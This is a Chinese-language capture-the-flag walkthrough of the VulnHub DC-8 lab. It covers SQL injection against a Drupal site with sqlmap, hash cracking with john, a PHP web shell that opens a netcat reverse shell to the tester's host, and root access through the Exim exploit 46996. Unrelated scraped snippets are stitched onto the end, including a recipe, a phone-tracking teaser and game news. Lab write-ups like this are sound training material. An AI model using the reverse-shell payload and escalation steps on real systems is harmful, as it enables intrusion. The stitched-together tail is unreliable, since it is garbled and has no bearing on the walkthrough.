靶场名称: DC: 8
靶场发布时间:2019-9-8
靶场地址:https://www.vulnhub.com/entry/dc-8,367/
靶场描述:
DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of concept" as to whether two-factor authentication installed and configured on Linux can prevent the Linux server from being exploited.
The "proof of concept" portion of this challenge eventuated as a result of a question being asked about two-factor authentication and Linux on Twitter, and also due to a suggestion by @theart42.
The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read the one and only flag.
You probably wouldn't even know that two-factor authentication was installed and configured unless you attempt to login via SSH, but it's definitely there and doing it's job.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
VMware虚拟机(桥接模式)
获取靶机的IP
nmap -sn 192.168.3.0/24
使用nmap来查看靶机的端口信息和系统信息等等
首先去查看80端口的web服务 还是Drupal
提示不用爆破破解,使用dirb扫描一下目录
存在robots.txt文件
登录地址:
版本大致的判断:
这三个页面url中存在参数sqlmap去尝试一下
sqlmap确定存在sql注入
读取一下数据
drupal的密码是特殊加密的需要爆破破解,使用john
john pwd --wordlist=/usr/share/wordlists/rockyou.txt
john/turtle 登录页面
登录后需要获取到shell
在页面中发现可以直接执行php语句
写入shell
<?php system("nc -e /bin/bash 192.168.3.20 1234"); ?>
反弹到kali中 随便提交数据
反弹成功
切换shell
查看一下用户有那些
在看看有没有内核提权
find / -perm -u=s -type f 2>/dev/null 查看具有root权限的命令
查看一下exim4的版本 又没有漏洞
exim4 --version
https://www.exploit-db.com/exploits/46996找到一个可以使用的exp
下载exp,上传到靶机中并赋予权限
使用过程中报错了
需要对exp脚本 执行编码
vim 46996.sh
:set ff=unix
:wq
在重新上传到靶机中 提权(改完还是报错),直接复制代码在靶机中创建文件填写
执行成功。
获取到root权限
大盘鸡的制作方法(大厨教你新疆大盘鸡正宗做法) 大厨教你新疆大盘鸡正宗做法,饭店常用配方,学会在家随时吃 大厨分享新疆大盘鸡做法,详解配方和技术要领,教你轻松做大厨 大家好,我是第一美食的阿飞,...
怎样让手机定位锁定一个位置(怎么通过手机锁定对方位置)瑕不掩瑜的《红楼梦》是中国最伟大的一部小说。美籍华裔学者夏志清先生有一个观点,如果没有脂砚斋干扰曹雪芹的想象,曹雪芹就不会把太多的时间浪费在频繁的...
kiftd简介: kiftd是一款专门面向个人、团队和小型组织的私有网盘系统。开源、便捷、小巧。无论是在笔记本上、家庭、学校还是办公室,均可以随时随地使用它。它不但是替代U盘进行文件传输的不二之选,同...
去一些大型黑客网站就可以学的到的黑客基地华夏黑客同盟之类的 你找他们干什么,找到了他们也不会帮你的,想做事情还是自己学技术,学技术就去非黑客安全论坛这里绝对是你最好的地方非黑客安全论坛从华夏黑客联。...
随着农村经济发展,人们对于养殖业的发展也比较看好,因为在农村来说发展经济又局限性,虽然很多地方有很多项目兴起,但是对于农村来说还是养殖和种植为主,那么2019年到底养殖什么能赚钱呢?下面就和大家一起分...
卡片限制交易一次被“阉割”,对商人打击太大,9.24国庆版本不会更新,但卡片升级合成系统,在体验服已经出现。值得一提的是,此次卡片升级系统,传说品级可100%成功,而合成可出团本卡片。 早在之前,韩...